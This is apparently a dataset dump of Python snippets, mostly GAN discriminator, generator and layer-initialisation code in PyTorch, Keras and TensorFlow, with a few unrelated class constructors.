itertools.chain(*reg_params)\n self.non_reg_params = getattr(self, \"conv{}\".format(self.num_layers)).parameters()\n else:\n self.reg_params = OrderedDict()\n self.non_reg_params = self.parameters()\n else:\n self.reg_params = self.parameters()\n self.non_reg_params = OrderedDict()\n self.to(self.device)", "def __init__(self, vgg_net):\n super().__init__()\n # create a conv layer that corresponds to the first linear layer\n linear1 = vgg_net.classifier[0]\n conv = nn.Conv2d(512, 4096, 7, 7)\n\n # copy data into it\n conv.bias.data.copy_(linear1.bias.data)\n conv.weight.data.view(4096, -1).copy_(linear1.weight.data)\n\n # replace the layer in the sequential classifier part\n vgg_net.classifier = nn.Sequential(\n conv, nn.Flatten(1), *vgg_net.classifier[1:]\n )\n\n self.vgg_net = vgg_net", "def init_bn(bn):\n \n bn.bias.data.fill_(0.)\n bn.running_mean.data.fill_(0.)\n bn.weight.data.fill_(1.)\n bn.running_var.data.fill_(1.)", "def build_patch_discriminator(self, model_shape, filters=32, k_size=4, drop=False, rate=0.5, summary=False, model_file=None, name='gan_d_'):\n if (model_file):\n \"\"\"\n Load pretreined model\n \"\"\"\n model = self.utils.build_pretrained_model(model_file)\n if (summary):\n model.summary()\n return model\n else:\n \"\"\"\n Create a Discriminator Model using hyperparameters values defined as follows\n \"\"\"\n init = RandomNormal(stddev=0.02)\n n_rows = model_shape[0]\n n_cols = model_shape[1]\n c_dims = model_shape[2]\n\n input_shape = (n_rows, n_cols, c_dims)\n input_layer = Input(shape=input_shape, name=name+'input')\n\n d = self.Conv2D_Block(input_layer, filters, k_size=k_size, name=name+'1', bn=False)\n d = self.Conv2D_Block(d, 2*filters, k_size=k_size, name=name+'2')\n d = self.Conv2D_Block(d, 4*filters, k_size=k_size, name=name+'3')\n d = self.Conv2D_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'4')\n d = self.Conv2D_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'5')\n\n if drop:\n d = Dropout(rate=0.5, name=name+'_dropout')(d, training=True)\n logits = Conv2D(1, k_size, strides=1, padding='same', kernel_initializer=init, name=name+'logits')(d)\n out = Activation('sigmoid', name=name+'sigmoid')(logits)\n\n model = Model(inputs=[input_layer], outputs=[out, logits], name='Discriminator_'+name[-3:])\n if (summary):\n model.summary()\n return model", "def _init_layers(self) -> None:\n super()._init_layers()\n self.controller = nn.Conv2d(\n self.feat_channels, self.num_params, 3, padding=1)", "def discriminator():\n model = nn.Sequential(\n Flatten(),\n nn.Linear(784,256),\n nn.LeakyReLU(0.01, inplace=True),\n nn.Linear(256,256),\n nn.LeakyReLU(0.01, inplace=True),\n nn.Linear(256,1)\n )\n return model", "def discriminator(self, images): # pylint: disable=R0201\n return standard_discriminator(images)", "def __init__(self, cell, shape):\n self.cell = cell\n self.shape = shape\n self.dimension = cell.dimension\n self.Nsites = np.prod(shape) * self.cell.Nsites\n self.sites = np.zeros(self.shape+[self.cell.Nsites],dtype='object')\n self.bonds = []\n self.build_sites()\n self.build_bonds()", "def discriminator_model():\n\n Discriminator = Sequential(name='Discriminator')\n\n # Downsampling : 32x32x3 --> 16x16x64\n Discriminator.add(Conv2D(filters=64, kernel_size=(5, 5), strides=2, padding='same', \n kernel_initializer=RandomNormal(stddev=GAUSS_SD), \n input_shape=DISCRIMINATOR_INPUT))\n Discriminator.add(LeakyReLU(ALPHA))\n\n # Downsampling : 16x16x64 --> 8x8x128\n Discriminator.add(Conv2D(filters=128, kernel_size=(5, 5), strides=2, 
padding='same'))\n Discriminator.add(BatchNormalization(momentum=MOMENTUM))\n Discriminator.add(LeakyReLU(ALPHA))\n\n # Downsampling : 8x8x128 --> 4x4x256\n Discriminator.add(Conv2D(filters=128, kernel_size=(5, 5), strides=2, padding='same'))\n Discriminator.add(BatchNormalization(momentum=MOMENTUM))\n Discriminator.add(LeakyReLU(ALPHA))\n\n # Downsampling : 4x4x256 --> 2x2x512\n Discriminator.add(Conv2D(filters=512, kernel_size=(5, 5), strides=2, padding='same'))\n Discriminator.add(BatchNormalization(momentum=MOMENTUM))\n Discriminator.add(LeakyReLU(ALPHA))\n\n # Fully Connected Layer (classifier) , 2x2x512 (2048) --> 1\n Discriminator.add(Flatten())\n Discriminator.add(Dropout(DROPOUT))\n Discriminator.add(Dense(1))\n\n return Discriminator", "def __init__(self, nunmbers_doors, immats, colors):\n self.numbers_doors = nunmbers_doors\n super().__init__(immats, colors)", "def __init__(self, machine):\n super().__init__(machine)\n self.features['has_rgb_dmd'] = True", "def discriminator_model_organs():\n # Initialize the weights\n init = tf.random_normal_initializer(0.0, 0.02)\n\n img_shape = (512, 512, 1)\n\n # Source and target image input\n source_img = tf.keras.Input(shape=img_shape)\n target_img = tf.keras.Input(shape=img_shape)\n\n # Concatenate images channel-wise\n src_tgt_img = Concatenate()([source_img, target_img]) # L: 512 x 512 x 1 # G: 256 x 256 x 1\n\n # C128\n d1 = Conv2D(filters=128, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n src_tgt_img) # L: 256 x 256 x 128 # G: 128 x 128 x 128 # RF: 4\n d1 = LeakyReLU(alpha=0.2)(d1)\n\n # C256\n d2 = Conv2D(filters=256, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n d1) # L: 128 x 128 x 256 # G: 64 x 64 x 256 # RF: 10\n d2 = BatchNormalization()(d2)\n d2 = LeakyReLU(alpha=0.2)(d2)\n\n # C256\n d3 = Conv2D(filters=256, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n d2) # L: 64 x 64 x 256 # G: 32 x 32 x 256 # RF: 22\n d3 = BatchNormalization()(d3)\n d3 = LeakyReLU(alpha=0.2)(d3)\n\n # C512\n d4 = Conv2D(filters=512, kernel_size=(4, 4), strides=(1, 1), padding='valid', kernel_initializer=init)(\n d3) # L: 61 x 61 x 512 # G: 29 x 29 x 512 # RF: 46\n d4 = BatchNormalization()(d4)\n d4 = LeakyReLU(alpha=0.2)(d4)\n d4 = ZeroPadding2D()(d4) # L: 63 x 63 x 512 # G: 31 x 31 x 512\n\n # Patch output\n d5 = Conv2D(filters=1, kernel_size=(4, 4), strides=(1, 1), padding='valid', kernel_initializer=init)(\n d4) # L: 60 x 60 x 1 # G: 28 x 28 x 1 # RF: 70\n output_patch = Activation('sigmoid')(d5)\n\n # Define model\n discriminator_model = tf.keras.Model([source_img, target_img], output_patch)\n return discriminator_model", "def _build(self, generation):\n with tf.variable_scope ('discriminator') as scope:\n \n image_unflatten = unflatten_layer ( self.images )\n gen_unflatten = unflatten_layer ( generation )\n\n # Conv Layer 1 - image\n conv1_out_image, params = conv_2d_layer (\n input = image_unflatten,\n neurons = CONV_1_N,\n filter_size = CONV_1_FILT,\n name = 'conv_1_img',\n visualize = True ) \n pool1_out_img = max_pool_2d_layer ( input = conv1_out_image, name = 'pool_1_img')\n lrn1_out_img = local_response_normalization_layer (pool1_out_img, name = 'lrn_1_img' ) \n \n # Conv Layer 1 - gen\n conv1_out_gen, params = conv_2d_layer (\n input = gen_unflatten,\n neurons = CONV_1_N,\n filter_size = CONV_1_FILT,\n params = params,\n name = 'conv_1_gen',\n visualize = False )\n\n pool1_out_gen = max_pool_2d_layer ( input = conv1_out_gen, name = 
'pool_1_gen')\n lrn1_out_gen = local_response_normalization_layer (pool1_out_gen, name = 'lrn_1_gen' ) \n process_params(params, name = self.name)\n c1_params = params\n\n\n\n\n\n # Conv Layer 2 - image\n conv2_out_image, params = conv_2d_layer (\n input = lrn1_out_img,\n neurons = CONV_2_N,\n filter_size = CONV_2_FILT,\n name = 'conv_2_img' )\n\n pool2_out_img = max_pool_2d_layer ( input = conv2_out_image, name = 'pool_2_img')\n lrn2_out_img = local_response_normalization_layer (pool2_out_img, name = 'lrn_2_img' ) \n\n\n # Conv Layer 2 - gen\n conv2_out_gen, params = conv_2d_layer (\n input = lrn1_out_gen,\n neurons = CONV_2_N,\n filter_size = CONV_2_FILT,\n params = params,\n name = 'conv_2_gen' )\n\n pool2_out_gen = max_pool_2d_layer ( input = conv2_out_gen, name = 'pool_2_gen')\n lrn2_out_gen = local_response_normalization_layer (pool2_out_gen, name = 'lrn_2_gen' ) \n process_params(params, name = self.name)\n c2_params = params\n\n # Dropout Layer\n flat_gen = flatten_layer(lrn2_out_gen)\n flat_img = flatten_layer(lrn2_out_img)\n\n flat_gen_dropout = dropout_layer ( input = flat_gen,\n prob = self.dropout_prob,\n name = 'dropout_1_gen') \n\n flat_img_dropout = dropout_layer ( input = flat_img,\n prob = self.dropout_prob,\n name = 'dropout_1_img') \n\n\n\n # Dot Product Layer 1 -img\n fc1_out_img, params = dot_product_layer ( input = flat_img_dropout,\n neurons = HIDDEN_1,\n name = 'image_disc_dot_1')\n # Dot Product Layer 1 - gen\n fc1_out_gen, params = dot_product_layer ( input = flat_gen_dropout,\n params = params,\n neurons = HIDDEN_2,\n name = 'gen_disc_dot_1')\n\n process_params(params, name = self.name)\n d1_params = params\n \n ##\n fc1_out_gen_dropout = dropout_layer ( input = fc1_out_gen,\n prob = self.dropout_prob,\n name = 'dropout_2_gen') \n fc1_out_img_dropout = dropout_layer ( input = fc1_out_img,\n prob = self.dropout_prob,\n name = 'dropout_2_img')\n\n # Dot Product Layer 2 -img\n fc2_out_img, params = dot_product_layer ( input = fc1_out_img_dropout,\n neurons = HIDDEN_2,\n name = 'image_disc_dot_2')\n # Dot Product Layer 2 - gen\n fc2_out_gen, params = dot_product_layer ( input = fc1_out_gen_dropout,\n params = params,\n neurons = HIDDEN_2,\n name = 'gen_disc_dot_2')\n process_params(params, name = self.name)\n d2_params = params\n\n ##\n fc2_out_gen_dropout = dropout_layer ( input = fc2_out_gen,\n prob = self.dropout_prob,\n name = 'dropout_3_gen') \n fc2_out_img_dropout = dropout_layer ( input = fc2_out_img,\n prob = self.dropout_prob,\n name = 'dropout_3_img')\n\n # Dot Product Layer 1 -img\n self.real, params = dot_product_layer ( input = fc2_out_img_dropout,\n neurons = 1,\n activation = 'sigmoid',\n name = 'real')\n # Dot Product Layer 1 -gen\n self.fake, params = dot_product_layer ( input = fc2_out_gen_dropout,\n params = params,\n neurons = 1,\n activation = 'sigmoid',\n name = 'fake')\n\n process_params(params, name = self.name)\n d3_params = params\n self.params = [c1_params, c2_params, d1_params, d2_params, d3_params] \n\n\n with tf.variable_scope (self.name + '_objectives') as scope: \n with tf.variable_scope( self.name + 'discriminator_obj') as scope: \n # discriminator_obj = - 0.5 * tf.reduce_mean(log(self.real)) - \\\n # 0.5 * tf.reduce_mean(log(1-self.fake))\n discriminator_obj = 0.5 * tf.reduce_mean ((self.real-1)**2) + \\\n 0.5 * tf.reduce_mean ((self.fake)**2)\n tf.summary.scalar('discriminator_obj', discriminator_obj)\n tf.add_to_collection( self.name + '_objectives', discriminator_obj ) \n\n with tf.variable_scope (self.name + '_probabilites') as 
scope: \n tf.summary.scalar('fake_probability', tf.reduce_mean(self.fake))\n tf.summary.scalar('real_probability', tf.reduce_mean(self.real))\n \n self._cook_optimizer( \n lr = DIS_GAN_LR, \n optimizer = DIS_GAN_OPTIMIZER,\n l1_coeff = DIS_GAN_L1_COEFF,\n l2_coeff = DIS_GAN_WEIGHT_DECAY_COEFF)", "def create(self):\n # Create a graph and add all layers\n self.graph = tf.Graph()\n with self.graph.as_default():\n # Define variable learning rate and dis_noise\n self.relative_lr = tf.placeholder_with_default([1.],[1],name=\"relative_lr\")\n self.relative_lr = self.relative_lr[0]\n \n self.rel_dis_noise = tf.placeholder_with_default([1.],[1],name=\"rel_dis_noise\")\n self.rel_dis_noise = self.rel_dis_noise[0]\n self.dis_noise = self.rel_dis_noise * self.dis_noise_0\n \n \n # Create the generator and discriminator\n if self.architecture == 'Res6':\n gen_dim = [64, 128,256, 256,256,256,256,256,256, 128,64 ]\n kernel_size =[7, 3,3, 3,3,3,3,3,3, 3,3, 7]\n elif self.architecture == 'Res9':\n gen_dim= [64, 128,256, 256,256,256,256,256,256,256,256,256, 128,64 ]\n kernel_size=[7, 3,3, 3,3,3,3,3,3,3,3,3, 3,3, 7]\n else:\n print('Unknown generator architecture')\n return None\n \n self.genA = Res_Gen.ResGen('BtoA',self.a_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n self.genB = Res_Gen.ResGen('AtoB',self.b_chan,gen_dim=gen_dim,kernel_size=kernel_size,deconv=self.deconv,verbose=self.verbose)\n \n if self.patchgan == 'Patch34':\n self.disA = PatchGAN34.PatchGAN34('A',noise=self.dis_noise)\n self.disB = PatchGAN34.PatchGAN34('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch70':\n self.disA = PatchGAN70.PatchGAN70('A',noise=self.dis_noise)\n self.disB = PatchGAN70.PatchGAN70('B',noise=self.dis_noise)\n elif self.patchgan == 'Patch142':\n self.disA = PatchGAN142.PatchGAN142('A',noise=self.dis_noise)\n self.disB = PatchGAN142.PatchGAN142('B',noise=self.dis_noise)\n elif self.patchgan == 'MultiPatch':\n self.disA = MultiPatch.MultiPatch('A',noise=self.dis_noise)\n self.disB = MultiPatch.MultiPatch('B',noise=self.dis_noise)\n else:\n print('Unknown Patch discriminator type')\n return None\n \n self.disA_His = HisDis.HisDis('A',noise=self.dis_noise,keep_prob=1.)\n self.disB_His = HisDis.HisDis('B',noise=self.dis_noise,keep_prob=1.)\n \n # Create a placeholder for the input data\n self.A = tf.placeholder(tf.float32,[None, None, None, self.a_chan],name=\"a\")\n self.B = tf.placeholder(tf.float32,[None, None, None, self.b_chan],name=\"b\")\n \n if self.verbose:\n print('Size A: ' +str(self.a_chan)) # Often 1 --> Real\n print('Size B: ' +str(self.b_chan)) # Often 3 --> Syn\n \n # Create cycleGAN \n \n self.fake_A = self.genA.create(self.B,False)\n self.fake_B = self.genB.create(self.A,False)\n \n \n \n # Define the histogram loss\n t_A = tf.transpose(tf.reshape(self.A,[-1, self.a_chan]),[1,0])\n t_B = tf.transpose(tf.reshape(self.B,[-1, self.b_chan]),[1,0])\n t_fake_A = tf.transpose(tf.reshape(self.fake_A,[-1, self.a_chan]),[1,0])\n t_fake_B = tf.transpose(tf.reshape(self.fake_B,[-1, self.b_chan]),[1,0])\n\n self.s_A,_ = tf.nn.top_k(t_A,tf.shape(t_A)[1])\n self.s_B,_ = tf.nn.top_k(t_B,tf.shape(t_B)[1])\n self.s_fake_A,_ = tf.nn.top_k(t_fake_A,tf.shape(t_fake_A)[1])\n self.s_fake_B,_ = tf.nn.top_k(t_fake_B,tf.shape(t_fake_B)[1])\n \n self.m_A = tf.reshape(tf.reduce_mean(tf.reshape(self.s_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_A = 
tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_A,[self.a_chan, self.imsize, -1]),axis=2),[1, -1])\n self.m_fake_B = tf.reshape(tf.reduce_mean(tf.reshape(self.s_fake_B,[self.b_chan, self.imsize, -1]),axis=2),[1, -1])\n \n # Define generator loss functions\n self.lambda_c = tf.placeholder_with_default([self.lambda_c],[1],name=\"lambda_c\")\n self.lambda_c = self.lambda_c[0]\n self.lambda_h = tf.placeholder_with_default([self.lambda_h],[1],name=\"lambda_h\")\n self.lambda_h = self.lambda_h[0]\n \n self.dis_real_A = self.disA.create(self.A,False)\n self.dis_real_Ah = self.disA_His.create(self.m_A,False)\n self.dis_real_B = self.disB.create(self.B,False)\n self.dis_real_Bh = self.disB_His.create(self.m_B,False)\n self.dis_fake_A = self.disA.create(self.fake_A,True)\n self.dis_fake_Ah = self.disA_His.create(self.m_fake_A,True)\n self.dis_fake_B = self.disB.create(self.fake_B,True)\n self.dis_fake_Bh = self.disB_His.create(self.m_fake_B,True)\n \n self.cyc_A = self.genA.create(self.fake_B,True)\n self.cyc_B = self.genB.create(self.fake_A,True)\n \n \n # Define cycle loss (eq. 2)\n self.loss_cyc_A = tf.reduce_mean(tf.abs(self.cyc_A-self.A))\n self.loss_cyc_B = tf.reduce_mean(tf.abs(self.cyc_B-self.B))\n \n self.loss_cyc = self.loss_cyc_A + self.loss_cyc_B\n \n # Define discriminator losses (eq. 1)\n self.loss_dis_A = (tf.reduce_mean(tf.square(self.dis_real_A)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_A)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Ah)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Ah)))*0.5*self.lambda_h\n \n \n self.loss_dis_B = (tf.reduce_mean(tf.square(self.dis_real_B)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_B)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Bh)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Bh)))*0.5*self.lambda_h\n \n self.loss_gen_A = tf.reduce_mean(tf.square(self.dis_fake_A)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Ah)) +\\\n self.lambda_c * self.loss_cyc/2.\n self.loss_gen_B = tf.reduce_mean(tf.square(self.dis_fake_B)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Bh)) +\\\n self.lambda_c * self.loss_cyc/2.\n \n # Create the different optimizer\n with self.graph.as_default():\n # Optimizer for Gen\n self.list_gen = []\n for var in tf.trainable_variables():\n if 'gen' in str(var):\n self.list_gen.append(var)\n optimizer_gen = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_gen = optimizer_gen.minimize(self.loss_gen_A+self.loss_gen_B,var_list=self.list_gen)\n \n # Optimizer for Dis\n self.list_dis = []\n for var in tf.trainable_variables():\n if 'dis' in str(var):\n self.list_dis.append(var)\n optimizer_dis = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_dis = optimizer_dis.minimize(self.loss_dis_A + self.loss_dis_B,var_list=self.list_dis)", "def __init__(self, args, normalization_mean, normalization_std,\n style_img, content_img, content_weight=1, style_weight=1000000):\n super(ArtNet, self).__init__()\n\n self.args = args\n\n self.style_img = style_img\n self.content_img = content_img\n\n self.content_layers = ['conv_4']\n self.style_layers = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\n # mean and std used for normalization\n self.normalization_mean = normalization_mean\n self.normalization_std = normalization_std\n\n # weights of content image and style image\n self.content_weight = args.content_weight if args else content_weight\n self.style_weight = args.style_weight if args else style_weight\n\n # initialize 
vgg19 pre-trained model\n self.model = vgg19(pretrained=True).features.to(device).eval()", "def __init__(self, **kwargs: dict) -> None:\n super(AnimeGAN_v2, self).__init__()\n self.model_name: str = 'animeGAN_v2'\n self.model_version: str = '1.0.0'\n \n self.pretrained_model_path: str = kwargs['pretrained_model_path']\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n torch.set_grad_enabled(False)\n\n self.model = Generator().eval().to(self.device)\n ckpt = torch.load(self.pretrained_model_path, map_location=self.device)\n self.model.load_state_dict(ckpt)", "def __init__(\n self,\n discriminators: Union[BaseDiscriminator, List[BaseDiscriminator]],\n validate: bool = True,\n ):\n super().__init__(validate)\n self._discriminator = discriminators\n self._n_circs = 0\n self._n_shots = 0\n self._n_slots = 0\n self._n_iq = 0", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(2)\n ]\n self.norms = ModuleList(norms_list)", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.cross_attn = MultiheadAttention(**self.cross_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(3)\n ]\n self.norms = ModuleList(norms_list)", "def __init__(self, opt):\n BaseModel.__init__(self, opt)\n # specify the training losses you want to print out. The training/test scripts will call <BaseModel.get_current_losses>\n self.loss_names = ['G_GAN', 'G_L1', 'D_real', 'D_fake']\n # specify the images you want to save/display. The training/test scripts will call <BaseModel.get_current_visuals>\n self.visual_names = ['real_A', 'fake_B', 'real_B']\n # specify the models you want to save to the disk. 
The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>\n if self.isTrain:\n self.model_names = ['G', 'D']\n else: # during test time, only load G\n self.model_names = ['G']\n\n # Set TPN_enabled to true if opt.TPN is defined\n if opt.TPN:\n self.TPN_enabled = True\n else:\n self.TPN_enabled = False\n\n # Conditional GANs need to take both input and output images; Therefore, #channels for D is input_nc + output_nc\n discr_input_nc = opt.input_nc + opt.output_nc\n\n # If TPN is enabled, switch to the U-Net with TPN architecture\n if self.TPN_enabled:\n opt.netG = 'unet_256_TPN'\n discr_input_nc +=1 # Additional Channel for Time Input\n\n # define networks (both generator and discriminator)\n self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,\n not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)\n\n if self.isTrain: # define a discriminator; \n self.netD = networks.define_D(discr_input_nc, opt.ndf, opt.netD,\n opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)\n\n if self.TPN_enabled:\n self.loss_names = ['G_GAN', 'G_L1', 'G_TPN', 'D_real', 'D_fake']\n\n # Store final gamma value and then set it to 0\n self.final_gamma = deepcopy(opt.gamma)\n opt.gamma = 0\n\n # Initiliaze m and c to None\n self.update_m = None\n self.update_c = None\n\n # Setup TPN if set to True\n print(\"\\nSetting up TPN\\n\")\n opt_TPN = deepcopy(opt) # copy train options and change later\n opt_TPN.model = 'time_predictor'\n opt_TPN.name = opt.TPN\n opt_TPN.netD = 'time_input'\n opt_TPN.ndf = 16 # Change depending on the ndf size used with the TPN model specified\n # hard-code some parameters for TPN test phase\n opt_TPN.display_id = -1 # no visdom display;\n opt_TPN.isTrain = False\n print(\"Options TPN: {}\\n\\n\".format(opt_TPN))\n self.TPN = create_model(opt_TPN) # create a model given opt_TPN.model and other options\n self.TPN.setup(opt_TPN) # regular setup: load\n\n if self.isTrain:\n # define loss functions\n self.criterionGAN = networks.GANLoss(opt.gan_mode).to(self.device)\n self.criterionL1 = torch.nn.L1Loss()\n # initialize optimizers; schedulers will be automatically created by function <BaseModel.setup>.\n self.optimizer_G = torch.optim.Adam(self.netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n\n # Check if lambda_L2 is in range [0,1]\n assert (0 <= self.opt.lambda_L2 <= 1)", "def __init__(self, colour, san, nags=[], comment=\"\", variations=[]):\n self.colour = colour\n self.san = san\n self.nags = self.nodes_to_nags(nags)\n self.comment = comment\n self.variations = variations", "def __init__(self, sigma_initializer=RandomNormal(0, 1), spectral_iterations=1,\n fully_diff_spectral=True, stateful=False, renormalize=False, **kwargs):\n super(SNConditionalConv2D, self).__init__(**kwargs)\n self.sigma_initializer = keras.initializers.get(sigma_initializer)\n self.fully_diff_spectral = fully_diff_spectral\n self.spectral_iterations = spectral_iterations\n self.stateful = stateful\n self.renormalize = renormalize", "def __init__(self, nn_architecture, seed=99):\n self.nn_architecture = nn_architecture\n self.seed = seed", "def __init__(self, use_wasserstein=True):\n\n opt = WassersteinCycleGANTestOptions if use_wasserstein else CycleGANTestOptions\n\n opt.checkpoints_dir = os.path.join(\n 
pathlib.Path(__file__).parent.absolute(), opt.checkpoints_dir\n )\n\n tf_properties = {\n \"load_size\": opt.load_size,\n \"crop_size\": opt.crop_size,\n \"preprocess\": opt.preprocess,\n \"mask\": os.path.join(os.path.dirname(__file__), opt.mask),\n \"no_flip\": True,\n \"grayscale\": True,\n }\n self.transform = get_transform(**tf_properties)\n\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n if opt.is_wgan:\n netg_b_to_a = resnet_generator.ResnetGenerator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n get_norm_layer(opt.norm),\n dilations=opt.dilations,\n conv_layers_in_block=opt.conv_layers_in_block,\n )\n else:\n netg_b_to_a = generator.create_generator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.netg,\n opt.norm,\n not opt.no_dropout,\n opt.activation,\n opt.conv_layers_in_block,\n opt.dilations,\n )\n\n netg_b_to_a = init_net(netg_b_to_a, opt.init_type, opt.init_gain, self.device)\n\n ModelClass = CycleGANModel if not opt.is_wgan else WassersteinCycleGANModel\n\n self.model = ModelClass.from_dict(\n netg_a_to_b=None, netg_b_to_a=netg_b_to_a, **opt.to_dict()\n )\n\n self.model.networks.load(\n os.path.join(opt.checkpoints_dir, opt.name, f\"{opt.epoch}_net_\"),\n device=self.device,\n )\n self.model.eval()", "def discriminator_block(in_filters, out_filters, stride, normalize):\n layers = [nn.Conv2d(in_filters, out_filters, 3, stride, 1)]\n if normalize:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n layers = []\n in_filters = channels\n for out_filters, stride, normalize in [ (64, 2, False),\n (128, 2, True),\n (256, 2, True),\n (512, 1, True)]:\n layers.extend(discriminator_block(in_filters, out_filters, stride, normalize))\n in_filters = out_filters\n\n layers.append(nn.Conv2d(out_filters, 1, 3, 1, 1))\n\n self.model = nn.Sequential(*layers)\n\n \"\"\"CycleGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, normalize=True):\n \"\"\"Returns downsampling layers of each discriminator block\"\"\"\n layers = [nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1)]\n if normalize:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.model = nn.Sequential(\n *discriminator_block(in_channels, 64, normalize=False),\n *discriminator_block(64, 128),\n *discriminator_block(128, 256),\n *discriminator_block(256, 512),\n nn.ZeroPad2d((1, 0, 1, 0)),\n nn.Conv2d(512, 1, 4, padding=1)\n )\n\n \"\"\"DCGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, bn=True):\n block = [ nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25)]\n if bn:\n block.append(nn.BatchNorm2d(out_filters, 0.8))\n return block\n\n self.model = nn.Sequential(\n *discriminator_block(opt.channels, 16, bn=False),\n *discriminator_block(16, 32),\n *discriminator_block(32, 64),\n *discriminator_block(64, 128),\n )\n\n # The height and width of downsampled image\n ds_size = opt.img_size // 2**4\n self.adv_layer = nn.Sequential( nn.Linear(128*ds_size**2, 1),\n nn.Sigmoid())\n\n\n \"\"\"DiscoGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, normalization=True):\n \"\"\"Returns downsampling layers of each discriminator block\"\"\"\n layers = [nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1)]\n if normalization:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.model = nn.Sequential(\n 
*discriminator_block(in_channels, 64, normalization=False),\n *discriminator_block(64, 128),\n *discriminator_block(128, 256),\n nn.ZeroPad2d((1, 0, 1, 0)),\n nn.Conv2d(256, 1, 4, padding=1)\n )\n\n \"\"\"DraGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, bn=True):\n block = [ nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25)]\n if bn:\n block.append(nn.BatchNorm2d(out_filters, 0.8))\n return block\n\n self.model = nn.Sequential(\n *discriminator_block(opt.channels, 16, bn=False),\n *discriminator_block(16, 32),\n *discriminator_block(32, 64),\n *discriminator_block(64, 128),\n )\n\n # The height and width of downsampled image\n ds_size = opt.img_size // 2**4\n self.adv_layer = nn.Sequential( nn.Linear(128*ds_size**2, 1),\n nn.Sigmoid())\n\n \"\"\"EBGAN\n \"\"\"\n # Upsampling\n self.down = nn.Sequential(\n nn.Conv2d(opt.channels, 64, 3, 2, 1),\n nn.ReLU(),\n )\n # Fully-connected layers\n self.down_size = (opt.img_size // 2)\n down_dim = 64 * (opt.img_size // 2)**2\n\n self.embedding = nn.Linear(down_dim, 32)\n\n self.fc = nn.Sequential(\n nn.BatchNorm1d(32, 0.8),\n nn.ReLU(inplace=True),\n nn.Linear(32, down_dim),\n nn.BatchNorm1d(down_dim),\n nn.ReLU(inplace=True)\n )\n # Upsampling\n self.up = nn.Sequential(\n nn.Upsample(scale_factor=2),\n nn.Conv2d(64, opt.channels, 3, 1, 1)\n )\n\n \"\"\"InfoGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, bn=True):\n \"\"\"Returns layers of each discriminator block\"\"\"\n block = [ nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25)]\n if bn:\n block.append(nn.BatchNorm2d(out_filters, 0.8))\n return block\n\n self.conv_blocks = nn.Sequential(\n *discriminator_block(opt.channels, 16, bn=False),\n *discriminator_block(16, 32),\n *discriminator_block(32, 64),\n *discriminator_block(64, 128),\n )\n\n # The height and width of downsampled image\n ds_size = opt.img_size // 2**4\n\n # Output layers\n self.adv_layer = nn.Sequential(nn.Linear(128*ds_size**2, 1))\n self.aux_layer = nn.Sequential(\n nn.Linear(128*ds_size**2, opt.n_classes),\n nn.Softmax()\n )\n 